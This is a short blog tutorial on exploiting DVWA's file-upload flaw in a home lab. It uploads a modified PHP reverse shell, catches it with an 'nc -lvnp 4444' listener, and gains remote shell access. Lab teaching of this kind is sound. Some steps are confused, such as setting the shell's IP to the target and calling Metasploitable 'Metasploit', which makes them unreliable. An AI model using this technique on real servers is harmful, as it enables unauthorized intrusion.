Your AdSense code
top of page
Writer's pictureraoanveeksh
Jul 27, 20222 min read

FILE UPLOAD VULNERABLITY IN DVWS

by Anveeksh M Rao | TECH WITH ANVEEKSH | Cyber Security

What is File Upload in DVWS

when a web server allows users to upload files to its filesystem without sufficiently validating things like their name, type, contents, or size. The transmission of a file from one computer system to another, usually larger computer system. From a network user's point-of-view, to upload a file is to send it to another computer that is set up to receive it..


Lets Study Practical On FILE UPLOAD


Step 1: - Installing Metasploit in Vmare or VirtualBox and setup


FIG 1

Step 2: - open Metasploit and enter the login id :- msfadmin and password :- msfadmin. Now type ip addr or ipconfig and see your ip address eth0


FIG 2

Step 3 : - Now open your kali linux and open terminal and type the command ping <metasploit ipaddress> and [cmd] . Now you can see ip address is discoverd


FIG 3

Step 4 :- Now open the firefox and type http://10.0.2.18/dvwa/ then click DVWA


FIG 4

Step 5 :- open the DVWA secuiry and type Low /Medium/high and submit

In High you can only upload jepg file


FIG 5

Step 6 :- click on upload and now lets create a php file


FIG 6

Step 7:- Now open file manager >usr>share>Webshells>php>php-reverse-shell.php and open it and modify ip = <metasploitip> and port = 4444 (fig 7,8) and save it in Desktop


FIG 7


FIG 8

Step 8 :- Now copy and paste php-reverse-shell.php to shell.pHP file.Now open the teminal and type nc -lvnp 4444 (4444 is a port) where nc is netcat and enter


FIG 9

Step 9 :- Now in DVWA there is an upload option click on it and upload the pHP file in the folder now you can see , its sussesfully uploaded now copy the hackable/uploads/shell.php


FIG 10

Step 10 :- Now paste the copied dir from DVWA and upload in the url fromhttp://10.0.2.18/dvwa/vulnarabilities/upload/# to http://10.0.2.18/dvwa/hackable/uploads/shell.php (refer fig 11 , 12)


FIG 11


FIG 12

Step 11 :- Now you can see the warning page has opened but in the terminal you have enetered to the targeted device and now you can modify and edit and we can do whatever we can (Fig 13 , 14)


FIG 13


FIG 14


Conclusion

This only works on DVWA and never ever use any official website to upload file it will be not secure , yyou may arrestedunder the section 66 BE AWARE


This way you can get acess into it , I hope this article was helped you a lot

31 views0 comments

Comentarios

bottom of page